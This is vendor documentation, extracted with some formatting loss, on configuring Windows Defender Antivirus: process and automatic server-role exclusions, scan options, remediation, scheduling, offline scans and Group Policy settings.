Use Microsoft Intune to exclude files that have been opened by specified processes from scans:
Use System Center Configuration Manager to exclude files that have been opened by specified
processes from scans:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center
Use Group Policy to exclude files that have been opened by specified processes from scans:
templates.
4. Double-click Process Exclusions and add the exclusions:
c. Enter each process on its own line under the Value name column. See the example table for the different
types of process exclusions. Enter 0 in the Value column for all processes.
5. Click OK.
Use PowerShell cmdlets to exclude files that have been opened by specified processes from scans:
Using PowerShell to add or remove exclusions for files that have been opened by processes requires using a
combination of three cmdlets with the -ExclusionProcess parameter. The cmdlets are all in the Defender module.
<cmdlet> -ExclusionProcess "<item>"
Remove items from the list Remove-MpPreference
IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference , using the Set-MpPreference cmdlet again
will overwrite the existing list.
For example, the following code snippet would cause Windows Defender AV scans to exclude any file that is
opened by the specified process:
Add-MpPreference -ExclusionProcess "c:\internal\test.exe"
See [Manage antivirus with PowerShell cmdlets](use-powershell-cmdlets-windows-defender-Windows Defender

Antivirus.md) and Defender cmdlets for more information on how to use PowerShell with Windows Defender
Antivirus.
Use Windows Management Instruction (WMI ) to exclude files that have been opened by specified
ExclusionProcess
The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference ,
Add-MpPreference , and Remove-MpPreference .

Use the Windows Security app to exclude files that have been opened by specified processes from scans:
Use wildcards in the process exclusion list

The use of wildcards in the process exclusion list is different from their use in other exclusion lists.
In particular, you cannot use the question mark ? wildcard, and the asterisk * wildcard can only be used at the end
of a complete path. You can still use environment variables (such as %ALLUSERSPROFILE%) as wildcards when
defining items in the process exclusion list.
The following table describes how the wildcards can be used in the process exclusion list:
WILDCARD USE EXAMPLE USE EXAMPLE MATCHES
* (asterisk) Replaces any number of C:\MyData\* Any file opened by

characters C:\MyData\file.exe
? (question mark) Not available - -
Environment variables The defined variable will be %ALLUSERSPROFILE Any file opened by
populated as a path when %\CustomLogFiles\fil C:\ProgramData\Cust
the exclusion is evaluated e.exe omLogFiles\file.exe

You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, System Center Configuration
Manager, Intune, or the Windows Security app.
Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on separate
lines, but the items within each list will be combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are
interested in. Each use of Add-MpPreference is written to a new line.

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in December
2018) or later.
Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using
PowerShell:
Get-MpPreference
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label
you want to name the variable:
$WDAVprefs.ExclusionProcess
Related topics
Configure and validate exclusions based on file name, extension, and folder location
Configure Windows Defender Antivirus exclusions on
Windows Server
Applies to:
Windows Defender Antivirus on Windows Server 2016 computers automatically enrolls you in certain exclusions,
as defined by your specified server role. See the end of this topic for a list of these exclusions.
These exclusions will not appear in the standard exclusion lists shown in the Windows Security app.
You can still add or remove custom exclusions (in addition to the server role-defined automatic exclusions) as
described in these exclusion-related topics:
Custom exclusions take precedence over automatic exclusions.
TIP
Custom and duplicate exclusions do not conflict with automatic exclusions.
Windows Defender Antivirus uses the Deployment Image Servicing and Management (DISM ) tools to determine
which roles are installed on your computer.
Opt out of automatic exclusions

In Windows Server 2016, the predefined exclusions delivered by Security intelligence updates only exclude the
default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually
control the set of exclusions, you need to opt out of the automatic exclusions delivered in Security intelligence
updates.
WARNING
Opting out of automatic exclusions may adversely impact performance, or result in data corruption. The exclusions that are
delivered automatically are optimized for Windows Server 2016 roles.
NOTE
This setting is only supported on Windows Server 2016. While this setting exists in Windows 10, it doesn't have an effect on
exclusions.
TIP
Since the predefined exclusions only exclude default paths, if you move NTDS and SYSVOL to another drive or path different
than the original one, you would have to manually add the exclusions using the information here .
You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and WMI.
Use Group Policy to disable the auto-exclusions list on Windows Server 2016:
templates.
4. Double-click Turn off Auto Exclusions and set the option to Enabled. Click OK.
Use PowerShell cmdlets to disable the auto-exclusions list on Windows Server 2016:
Set-MpPreference -DisableAutoExclusions $true
Use Windows Management Instruction (WMI ) to disable the auto-exclusions list on Windows Server
2016:
DisableAutoExclusions

List of automatic exclusions

The following sections contain the exclusions that are delivered with automatic exclusions file paths and file types.
Default exclusions for all roles
This section lists the default exclusions for all Windows Server 2016 roles.
Windows "temp.edb" files:
%windir%\SoftwareDistribution\Datastore\*\tmp.edb
%ProgramData%\Microsoft\Search\Data\Applications\Windows\*\*.log
Windows Update files or Automatic Update files:
%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%windir%\SoftwareDistribution\Datastore\*\edb.chk
%windir%\SoftwareDistribution\Datastore\*\edb*.log
%windir%\SoftwareDistribution\Datastore\*\Edb*.jrs
%windir%\SoftwareDistribution\Datastore\*\Res*.log
Windows Security files:
%windir%\Security\database\*.chk
%windir%\Security\database\*.edb
%windir%\Security\database\*.jrs
%windir%\Security\database\*.log
%windir%\Security\database\*.sdb
Group Policy files:
%allusersprofile%\NTUser.pol
%SystemRoot%\System32\GroupPolicy\Machine\registry.pol
%SystemRoot%\System32\GroupPolicy\User\registry.pol
WINS files:
%systemroot%\System32\Wins\*\*.chk
%systemroot%\System32\Wins\*\*.log
%systemroot%\System32\Wins\*\*.mdb
%systemroot%\System32\LogFiles\
%systemroot%\SysWow64\LogFiles\
File Replication Service (FRS ) exclusions:
Files in the File Replication Service (FRS ) working folder. The FRS working folder is specified in the
registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory
%windir%\Ntfrs\jet\sys\*\edb.chk
%windir%\Ntfrs\jet\*\Ntfrs.jdb
%windir%\Ntfrs\jet\log\*\*.log
FRS Database log files. The FRS Database log file folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\Ntfrs\Parameters\DB Log File Directory
-%windir%\Ntfrs\*\Edb*.log
The FRS staging folder. The staging folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\NtFrs\Parameters\Replica
Sets\GUID\Replica Set Stage
%systemroot%\Sysvol\*\Nntfrs_cmp*\
The FRS preinstall folder. This folder is specified by the folder
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs*\
The Distributed File System Replication (DFSR ) database and working folders. These folders
are specified by the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\DFSR\Parameters\Replication
Groups\GUID\Replica Set Configuration File
NOTE
For custom locations, see Opt out of automatic exclusions.
%systemdrive%\System Volume Information\DFSR\$db_normal$

%systemdrive%\System Volume Information\DFSR\FileIDTable_*
%systemdrive%\System Volume Information\DFSR\SimilarityTable_*
%systemdrive%\System Volume Information\DFSR\*.XML
%systemdrive%\System Volume Information\DFSR\$db_dirty$
%systemdrive%\System Volume Information\DFSR\$db_clean$
%systemdrive%\System Volume Information\DFSR\$db_lostl$
%systemdrive%\System Volume Information\DFSR\Dfsr.db
%systemdrive%\System Volume Information\DFSR\*.frx
%systemdrive%\System Volume Information\DFSR\*.log
%systemdrive%\System Volume Information\DFSR\Fsr*.jrs
%systemdrive%\System Volume Information\DFSR\Tmp.edb
Process exclusions
%systemroot%\System32\dfsr.exe
%systemroot%\System32\dfsrs.exe
Hyper-V exclusions:
This section lists the file type exclusions, folder exclusions, and process exclusions that are delivered
automatically when you install the Hyper-V role
File type exclusions:
*.vhd
*.vhdx
*.avhd
*.avhdx
*.vsv
*.iso
*.rct
*.vmcx
*.vmrs
Folder exclusions:
%ProgramData%\Microsoft\Windows\Hyper-V
%ProgramFiles%\Hyper-V
%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots
%Public%\Documents\Hyper-V\Virtual Hard Disks
Process exclusions:
%systemroot%\System32\Vmms.exe
%systemroot%\System32\Vmwp.exe
SYSVOL files:
%systemroot%\Sysvol\Domain\*.adm
%systemroot%\Sysvol\Domain\*.admx
%systemroot%\Sysvol\Domain\*.adml
%systemroot%\Sysvol\Domain\Registry.pol
%systemroot%\Sysvol\Domain\*.aas
%systemroot%\Sysvol\Domain\*.inf
%systemroot%\Sysvol\Domain\*.Scripts.ini
%systemroot%\Sysvol\Domain\*.ins
%systemroot%\Sysvol\Domain\Oscfilter.ini
Active Directory exclusions
This section lists the exclusions that are delivered automatically when you install Active Directory Domain Services.
NTDS database files. The database files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File
%windir%\Ntds\ntds.dit
%windir%\Ntds\ntds.pat
The AD DS transaction log files. The transaction log files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files
%windir%\Ntds\EDB*.log
%windir%\Ntds\Res*.log
%windir%\Ntds\Edb*.jrs
%windir%\Ntds\Ntds*.pat
%windir%\Ntds\TEMP.edb
The NTDS working folder. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
%windir%\Ntds\Temp.edb
%windir%\Ntds\Edb.chk
Process exclusions for AD DS and AD DS -related support files:
%systemroot%\System32\ntfrs.exe
%systemroot%\System32\lsass.exe
DHCP Server exclusions
This section lists the exclusions that are delivered automatically when you install the DHCP Server role. The DHCP
Server file locations are specified by the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters in
the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters
%systemroot%\System32\DHCP\*\*.mdb
%systemroot%\System32\DHCP\*\*.pat
%systemroot%\System32\DHCP\*\*.log
%systemroot%\System32\DHCP\*\*.chk
%systemroot%\System32\DHCP\*\*.edb
DNS Server exclusions
This section lists the file and folder exclusions and the process exclusions that are delivered automatically when you
install the DNS Server role.
File and folder exclusions for the DNS Server role:
%systemroot%\System32\Dns\*\*.log
%systemroot%\System32\Dns\*\*.dns
%systemroot%\System32\Dns\*\*.scc
%systemroot%\System32\Dns\*\BOOT
Process exclusions for the DNS Server role:
%systemroot%\System32\dns.exe
File and Storage Services exclusions
This section lists the file and folder exclusions that are delivered automatically when you install the File and Storage
Services role. The exclusions listed below do not include exclusions for the Clustering role.
%SystemDrive%\ClusterStorage
%clusterserviceaccount%\Local Settings\Temp
%SystemDrive%\mscs
Print Server exclusions
This section lists the file type exclusions, folder exclusions, and the process exclusions that are delivered
automatically when you install the Print Server role.
*.shd
*.spl
Folder exclusions. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory
%system32%\spool\printers\*
Process exclusions:
spoolsv.exe
Web Server exclusions
This section lists the folder exclusions and the process exclusions that are delivered automatically when you install
the Web Server role.
Folder exclusions:
%SystemRoot%\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\ASP Compiled Templates
%systemDrive%\inetpub\logs
%systemDrive%\inetpub\wwwroot
Process exclusions:
%SystemRoot%\system32\inetsrv\w3wp.exe
%SystemRoot%\SysWOW64\inetsrv\w3wp.exe
%SystemDrive%\PHP5433\php-cgi.exe
Windows Server Update Services exclusions
This section lists the folder exclusions that are delivered automatically when you install the Windows Server Update
Services (WSUS ) role. The WSUS folder is specified in the registry key
HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup
%systemroot%\WSUS\WSUSContent
%systemroot%\WSUS\UpdateServicesDBFiles
%systemroot%\SoftwareDistribution\Datastore
%systemroot%\SoftwareDistribution\Download
Related topics
Configure and validate exclusions for Windows Defender Antivirus scans
Configure Windows Defender Antivirus scanning options
Applies to:
Use Microsoft Intune to configure scanning options
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction settings for
Windows 10 in Intune for more details.
Use Configuration Manager to configure scanning options:
See How to create and deploy antimalware policies: Scan settings for details on configuring System Center Configuration
Use Group Policy to configure scanning options
To configure the Group Policy settings described in the following table:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy
Object you want to configure and click Edit.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location specified in the
table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired configuration. Click OK,
and repeat for any other settings.
POWERSHELL SET-MPPREFERENCE
DEFAULT SETTING (IF NOT PARAMETER OR WMI PROPERTY
DESCRIPTION LOCATION AND SETTING CONFIGURED) FOR MSFT_MPPREFERENCE CLASS
See Email scanning limitations) Scan > Turn on e-mail scanning Disabled -DisableEmailScanning
below
Scan reparse points Scan > Turn on reparse point Disabled Not available
scanning
Scan mapped network drives Scan > Run full scan on mapped Disabled -
network drives DisableScanningMappedNetworkDrivesForFullSca
Scan archive files (such as .zip or Scan > Scan archive files Enabled -DisableArchiveScanning
.rar files). The extensions
exclusion list will take
precedence over this setting.
Scan files on the network Scan > Scan network files Disabled -
DisableScanningNetworkFiles
Scan packed executables Scan > Scan packed executables Enabled Not available
Scan removable drives during Scan > Scan removable drives Disabled -
full scans only DisableRemovableDriveScanning
Specify the level of subfolders Scan > Specify the maximum 0 Not available
within an archive folder to scan depth to scan archive files
Specify the maximum CPU load Scan > Specify the maximum 50 -ScanAvgCPULoadFactor
(as a percentage) during a scan. percentage of CPU utilization
Note: This is not a hard limit but during a scan
rather a guidance for the
scanning engine to not exceed
this maximum on average.
Specify the maximum size (in Scan > Specify the maximum No limit Not available
kilobytes) of archive files that size of archive files to be
should be scanned. The default, scanned
0, applies no limit
Configure low CPU priority for Scan > Configure low CPU Disabled Not available
scheduled scans priority for scheduled scans
NOTE
If real-time protection is enabled, files are scanned before they are accessed and executed. The scanning scope includes all files, including
those on mounted removable devices such as USB drives.
Use PowerShell to configure scanning options

See Manage Windows Defender Antivirus with PowerShell cmdlets and Defender cmdlets for more information on how to use
PowerShell with Windows Defender Antivirus.
Use WMI to configure scanning options
For using WMI classes, see Windows Defender WMIv2 APIs.
Email scanning limitations
We recommend using always-on real-time protection to protect against email-based malware.
Always-on protection scans emails as they arrive and as they are manipulated, just like normal files in the operating system. This
provides the strongest form of protection and is the recommended setting for scanning emails.
You can also use this Group Policy to enable scanning of older email files used by Outlook 2003 and older during on-demand
and scheduled scans. Embedded objects within an email file (such as attachments and archived files) are also scanned. The
following file format types can be scanned and remediated:
DBX
MBX
MIME
PST files used by Outlook 2003 or older (where the archive type is set to non-unicode) can also be scanned, but Windows
Defender cannot remediate threats detected inside PST files. This is another reason why we recommend using always-on real-
time protection to protect against email-based malware.
If Windows Defender Antivirus detects a threat inside an email, it will show you the following information to assist you in
identifying the compromised email, so you can remediate the threat:
Email subject
Attachment name
WARNING
There are some risks associated with scanning some Microsoft Outlook files and email messages. You can read about tips and risks
associated with scanning Outlook files and email messages in the following articles:
Scanning Outlook files in Outlook 2013
Scanning email messages in Outlook 2013
Related topics
Configure and run on-demand Windows Defender Antivirus scans
Configure scheduled Windows Defender Antivirus scans
Configure remediation for Windows Defender
Antivirus scans
Applies to:
When Windows Defender Antivirus runs a scan, it will attempt to remediate or remove threats that it finds. You can
configure how Windows Defender Antivirus should react to certain threats, whether it should create a restore point
before remediating, and when it should remove remediated threats.
This topic describes how to configure these settings with Group Policy, but you can also use System Center
Configuration Manager and Microsoft Intune.
You can also use the Set-MpPreference PowerShell cmdlet or MSFT_MpPreference WMI class to configure these
settings.
Configure remediation options

You can configure how remediation works with the Group Policy settings described in this section.
templates.
configuration. Click OK, and repeat for any other settings.

Scan Create a system restore A system restore point will Disabled

point be created each day before
cleaning or scanning is
attempted
Scan Turn on removal of items Specify how many days 30 days

from scan history folder items should be kept in the
scan history
Root Turn off routine remediation You can specify whether Disabled (threats are
Windows Defender Antivirus remediated automatically)
automatically remediates
threats, or if it should ask
the endpoint user what to
do.
Quarantine Configure removal of items Specify how many days Never removed
from Quarantine folder items should be kept in
quarantine before being
removed
Threats Specify threat alert levels at Every threat that is detected Not applicable
which default action should by Windows Defender
not be taken when detected Antivirus is assigned a threat
level (low, medium, high, or
severe). You can use this
setting to define how all
threats for each of the threat
levels should be remediated
(quarantined, removed, or
ignored)
Threats Specify threats upon which Specify how specific threats Not applicable
default action should not be (using their threat ID) should
taken when detected be remediated. You can
specify whether the specific
threat should be
quarantined, removed, or
ignored
IMPORTANT
Windows Defender Antivirus detects and remediates files based on many factors. Sometimes, completing a remediation
requires a reboot. Even if the detection is later determined to be a false positive, the reboot must be completed to ensure all
additional remediation steps have been completed.
If you are certain Windows Defender Antivirus quarantined a file based on a false positive, you can restore the file from
quarantine after the device reboots. See Restore quarantined files in Windows Defender Antivirus.
To avoid this problem in the future, you can exclude files from the scans. See Configure and validate exclusions for Windows
Defender Antivirus scans.
Also see Configure remediation-required scheduled full Windows Defender Antivirus scans for more remediation-
related settings.
Related topics
Configure the notifications that appear on endpoints
Configure end-user Windows Defender Antivirus interaction
Configure scheduled quick or full Windows Defender
Antivirus scans
Applies to:
NOTE
By default, Windows Defender Antivirus checks for an update 15 minutes before the time of any scheduled scans. You can
Manage the schedule for when protection updates should be downloaded and applied to override this default.
In addition to always-on real-time protection and on-demand scans, you can set up regular, scheduled scans.
You can configure the type of scan, when the scan should occur, and if the scan should occur after a protection
update or if the endpoint is being used. You can also specify when special scans to complete remediation should
occur.
This topic describes how to configure scheduled scans with Group Policy, PowerShell cmdlets, and WMI. You can
also configure schedules scans with System Center Configuration Manager or Microsoft Intune.
To configure the Group Policy settings described in this topic:
Also see the Manage when protection updates should be downloaded and applied and Prevent or allow users to
locally modify policy settings topics.
Quick scan versus full scan and custom scan

When you set up scheduled scans, you can set up whether the scan should be a full or quick scan.
Quick scans look at all the locations where there could be malware registered to start with the system, such as
registry keys and known Windows startup folders.
Combined with always-on real-time protection capability - which reviews files when they are opened and closed,
and whenever a user navigates to a folder - a quick scan helps provide strong coverage both for malware that starts
with the system and kernel-level malware.
In most instances, this means a quick scan is adequate to find malware that wasn't picked up by real-time
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any inactive
components that require a more thorough clean-up. In this instance, you may want to use a full scan when running
an on-demand scan.
A custom scan allows you to specify the files and folders to scan, such as a USB drive.
NOTE
By default, quick scans run on mounted removable devices, such as USB drives.
Set up scheduled scans

Scheduled scans will run at the day and time you specify. You can use Group Policy, PowerShell, and WMI to
configure scheduled scans.
NOTE
If a computer is unplugged and running on battery during a scheduled full scan, the scheduled scan will stop with event
1002, which states that the scan stopped before completion. Windows Defender Antivirus will run a full scan at the next
scheduled time.
Use Group Policy to schedule scans:

Scan Specify the scan type to use Quick scan

for a scheduled scan
Scan Specify the day of the week Specify the day (or never) to Never
to run a scheduled scan run a scan.
Scan Specify the time of day to Specify the number of 2 am

run a scheduled scan minutes after midnight (for
example, enter 60 for 1 am).
Root Randomize scheduled task In Windows Defender Enabled

times Antivirus: Randomize the
start time of the scan to any
interval from 0 to 4 hours.
In FEP/SCEP: randomize to
any interval plus or minus
30 minutes. This can be
useful in VM or VDI
deployments.
Use PowerShell cmdlets to schedule scans:

Set-MpPreference -ScanParameters
Set-MpPreference -ScanScheduleDay
Set-MpPreference -ScanScheduleTime
Set-MpPreference -RandomizeScheduleTaskTimes
Use Windows Management Instruction (WMI ) to schedule scans:

Start scheduled scans only when the endpoint is not in use

You can set the scheduled scan to only occur when the endpoint is turned on but not in use with Group Policy,
PowerShell, or WMI.
Use Group Policy to schedule scans

Scan Start the scheduled scan Scheduled scans will not run, Enabled
only when computer is on unless the computer is on
but not in use but not in use
Use PowerShell cmdlets:

Set-MpPreference -ScanOnlyIfIdleEnabled
Use Windows Management Instruction (WMI ):

Configure when full scans should be run to complete remediation

Some threats may require a full scan to complete their removal and remediation. You can schedule when these
scans should occur with Group Policy, PowerShell, or WMI.
Use Group Policy to schedule remediation-required scans
Remediation Specify the day of the week Specify the day (or never) to Never
to run a scheduled full scan run a scan.
to complete remediation
Remediation Specify the time of day to Specify the number of 2 am

run a scheduled full scan to minutes after midnight (for
complete remediation example, enter 60 for 1 am)

Set-MpPreference -RemediationScheduleDay
Set-MpPreference -RemediationScheduleTime

Set up daily quick scans

You can enable a daily quick scan that can be run in addition to your other scheduled scans with Group Policy,
PowerShell, or WMI.
Use Group Policy to schedule daily scans:

Scan Specify the interval to run Specify how many hours Never
quick scans per day should elapse before the
next quick scan. For example,
to run every two hours,
enter 2, for once a day, enter
24. Enter 0 to never run a
daily quick scan.
Scan Specify the time for a daily Specify the number of 2 am

quick scan minutes after midnight (for
example, enter 60 for 1 am)
Use PowerShell cmdlets to schedule daily scans:

Set-MpPreference -ScanScheduleQuickTime
Use Windows Management Instruction (WMI ) to schedule daily scans:

Enable scans after protection updates

You can force a scan to occur after every protection update with Group Policy.
Use Group Policy to schedule scans after protection updates

Signature updates Turn on scan after Security A scan will occur immediately Enabled
intelligence update after a new protection
update is downloaded
Related topics
Prevent or allow users to locally modify policy settings
Configure and run on-demand Windows Defender
Antivirus scans
Applies to:
You can run an on-demand scan on individual endpoints. These scans will start immediately, and you can define
parameters for the scan, such as the location or type.
Quick scan versus full scan

Quick scan looks at all the locations where there could be malware registered to start with the system, such as
registry keys and known Windows startup folders.
Combined with always-on real-time protection capability--which reviews files when they are opened and closed,
and whenever a user navigates to a folder--a quick scan helps provide strong coverage both for malware that starts
with the system and kernel-level malware.
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any inactive
components that require a more thorough clean-up, and can be ideal when running on-demand scans.
NOTE
Use Configuration Manager to run a scan:

See Antimalware and firewall tasks: How to perform an on-demand scan for details on using System Center
Configuration Manager (current branch) to run a scan.
Use the mpcmdrum.exe command-line utility to run a scan:
Use the following -scan parameter:
mpcmdrun.exe -scan -scantype 1
See Use the mpcmdrun.exe commandline tool to configure and manage Windows Defender Antivirus for more
information on how to use the tool and additional parameters, including starting a full scan or defining paths.
Use Microsoft Intune to run a scan:
1. In Intune, go to Devices > All Devices and select the device you want to scan.
2. Select ...More and then select Quick Scan or Full Scan.
Use the Windows Security app to run a scan:
See Run a scan in the Windows Security app for instructions on running a scan on individual endpoints.
Use PowerShell cmdlets to run a scan:
Start-MpScan
Use Windows Management Instruction (WMI ) to run a scan:
Use the Start method of the MSFT_MpScan class.
Related topics
Review Windows Defender Antivirus scan results
Applies to:
After an Windows Defender Antivirus scan completes, whether it is an on-demand or scheduled scan, the results
are recorded and you can view the results.
Use Microsoft Intune to review scan results:
2. Click the scan results in Device actions status.
Use Configuration Manager to review scan results:
See How to monitor Endpoint Protection status.
Use the Windows Security app to review scan results:
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Scan history
label.
Click See full history for any of the sections to see previous detections and the action taken. You can
also clear the list.
Information about the last scan is displayed at the bottom of the page.
Use PowerShell cmdlets to review scan results:
The following cmdlet will return each detection on the endpoint. If there are multiple detections of the same threat,
each detection will be listed separately, based on the time of each detection:
Get-MpThreatDetection
You can specify -ThreatID to limit the output to only show the detections for a specific threat.
If you want to list threat detections, but combine detections of the same threat into a single item, you can use the
following cmdlet:
Get-MpThreat
Use Windows Management Instruction (WMI ) to review scan results:
Use the Get method of the MSFT_MpThreat and MSFT_MpThreatDetection classes.
Related topics
Run and review the results of a Windows Defender
Offline scan
Applies to:
Windows Defender Offline is an antimalware scanning tool that lets you boot and run a scan from a trusted
environment. The scan runs from outside the normal Windows kernel so it can target malware that attempts to
bypass the Windows shell, such as viruses and rootkits that infect or overwrite the master boot record (MBR ).
You can use Windows Defender Offline if you suspect a malware infection, or you want to confirm a thorough clean
of the endpoint after a malware outbreak.
In Windows 10, Windows Defender Offline can be run with one click directly from the Windows Security app. In
previous versions of Windows, a user had to install Windows Defender Offline to bootable media, restart the
endpoint, and load the bootable media.
Pre-requisites and requirements

Windows Defender Offline in Windows 10 has the same hardware requirements as Windows 10.
For more information about Windows 10 requirements, see the following topics:
NOTE
Windows Defender Offline is not supported on machines with ARM processors, or on Windows Server Stock Keeping Units.
To run Windows Defender Offline from the endpoint, the user must be logged in with administrator privileges.
Windows Defender Offline updates

Windows Defender Offline uses the most recent protection updates available on the endpoint; it's updated
whenever Windows Defender Antivirus is updated.
NOTE
Before running an offline scan, you should attempt to update Windows Defender AV protection. You can either force an
update with Group Policy or however you normally deploy updates to endpoints, or you can manually download and install
the latest protection updates from the Microsoft Malware Protection Center.
See the Manage Windows Defender Antivirus Security intelligence updates topic for more information.
Usage scenarios
In Windows 10, version 1607, you can manually force an offline scan. Alternatively, if Windows Defender
determines that Windows Defender Offline needs to run, it will prompt the user on the endpoint.
The need to perform an offline scan will also be revealed in System Center Configuration Manager if you're using it
to manage your endpoints.
The prompt can occur via a notification, similar to the following:
The user will also be notified within the Windows Defender client:
In Configuration Manager, you can identify the status of endpoints by navigating to Monitoring > Overview >
Security > Endpoint Protection Status > System Center Endpoint Protection Status.
Windows Defender Offline scans are indicated under Malware remediation status as Offline scan required.
Configure notifications
Windows Defender Offline notifications are configured in the same policy setting as other Windows Defender AV
notifications.
For more information about notifications in Windows Defender, see the Configure the notifications that appear on
endpoints topic.
Run a scan
IMPORTANT
Before you use Windows Defender Offline, make sure you save any files and shut down running programs. The Windows
Defender Offline scan takes about 15 minutes to run. It will restart the endpoint when the scan is complete. The scan is
performed outside of the usual Windows operating environment. The user interface will appear different to a normal scan
performed by Windows Defender. After the scan is completed, the endpoint will be restarted and Windows will load normally.
You can run a Windows Defender Offline scan with the following:
PowerShell
Use PowerShell cmdlets to run an offline scan:
Start-MpWDOScan
Use Windows Management Instruction (WMI ) to run an offline scan:
Use the MSFT_MpWDOScan class to run an offline scan.
The following WMI script snippet will immediately run a Windows Defender Offline scan, which will cause the
endpoint to restart, run the offline scan, and then restart and boot into Windows.
wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call Start

Use the Windows Defender Security app to run an offline scan:
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Advanced
scan label:
3. Select Windows Defender Offline scan and click Scan now.
NOTE
In Windows 10, version 1607, the offline scan could be run from under Windows Settings > Update & security >
Windows Defender or from the Windows Defender client.
Review scan results

Windows Defender Offline scan results will be listed in the Scan history section of the Windows Security app.
Related topics
Restore quarantined files in Windows Defender AV
Applies to:
If Windows Defender Antivirus is configured to detect and remediate threats on your device, Windows Defender
Antivirus quarantines suspicious files. If you are certain these files do not present a threat, you can restore them.
1. Open Windows Security.
2. Click Virus & threat protection and then click Threat History.
3. Under Quarantined threats, click See full history.
4. Click an item you want to keep, then click Restore. (If you prefer to remove the item, you can click Remove.)
Related topics
Review scan results
Manage Windows Defender Antivirus in your business
Applies to:
You can manage and configure Windows Defender Antivirus with the following tools:
Microsoft Intune
Group Policy
PowerShell cmdlets
Windows Management Instruction (WMI)
The mpcmdrun.exe utility
The topics in this section provide further information, links, and resources for using these tools to manage and
configure Windows Defender Antivirus.
In this section
TOPIC DESCRIPTION
Manage Windows Defender Antivirus with Microsoft Intune Information about using Intune and System Center
and System Center Configuration Manager Configuration Manager to deploy, manage, report, and
configure Windows Defender Antivirus
Manage Windows Defender Antivirus with Group Policy List of all Group Policy settings located in ADMX templates
settings
Manage Windows Defender Antivirus with PowerShell cmdlets Instructions for using PowerShell cmdlets to manage Windows
Defender Antivirus, plus links to documentation for all cmdlets
and allowed parameters
Manage Windows Defender Antivirus with Windows Instructions for using WMI to manage Windows Defender
Management Instrumentation (WMI) Antivirus, plus links to documentation for the WMIv2 APIs
(including all classes, methods, and properties)
Manage Windows Defender Antivirus with the mpcmdrun.exe Instructions on using the dedicated command-line tool to
command-line tool manage and use Windows Defender Antivirus
Use Group Policy settings to configure and manage
Applies to:
You can use Group Policy to configure and manage Windows Defender Antivirus on your endpoints.
In general, you can use the following procedure to configure or change Windows Defender Antivirus group policy
settings:
Group Policy Object (GPO ) you want to configure and click Edit.
5. Expand the section (referred to as Location in the table in this topic) that contains the setting you want to
configure, double-click the setting to open it, and make configuration changes.
6. Deploy the updated GPO as you normally do.
The following table in this topic lists the Group Policy settings available in Windows 10, version 1703, and provides
links to the appropriate topic in this documentation library (where applicable).
LOCATION SETTING DOCUMENTED IN TOPIC
Client interface Enable headless UI mode Prevent users from seeing or interacting
with the Windows Defender Antivirus
user interface
Client interface Display additional text to clients when Configure the notifications that appear
they need to perform an action on endpoints
Client interface Suppress all notifications Configure the notifications that appear
on endpoints
Client interface Suppresses reboot notifications Configure the notifications that appear
on endpoints
Exclusions Extension Exclusions Configure and validate exclusions in

Windows Defender Antivirus scans
Exclusions Path Exclusions Configure and validate exclusions in

Exclusions Process Exclusions Configure and validate exclusions in

Exclusions Turn off Auto Exclusions Configure and validate exclusions in

MAPS Configure the 'Block at First Sight' Enable block at first sight
feature
MAPS Join Microsoft MAPS Enable cloud-delivered protection
MAPS Send file samples when further analysis Enable cloud-delivered protection
is required
MAPS Configure local setting override for Prevent or allow users to locally modify
reporting to Microsoft MAPS policy settings
MpEngine Configure extended cloud check Configure the cloud block timeout
period
MpEngine Select cloud protection level Specify the cloud-delivered protection

level
Network inspection system Specify additional definition sets for Not used
network traffic inspection
Network inspection system Turn on definition retirement Not used
Network inspection system Turn on protocol recognition Not used
Quarantine Configure local setting override for the Prevent or allow users to locally modify
removal of items from Quarantine folder policy settings
Quarantine Configure removal of items from Configure remediation for Windows

Quarantine folder Defender Antivirus scans
Real-time protection Configure local setting override for Prevent or allow users to locally modify
monitoring file and program activity on policy settings
your computer
monitoring for incoming and outgoing policy settings
file activity
scanning all downloaded files and policy settings
attachments
Real-time protection Configure local setting override for turn Prevent or allow users to locally modify
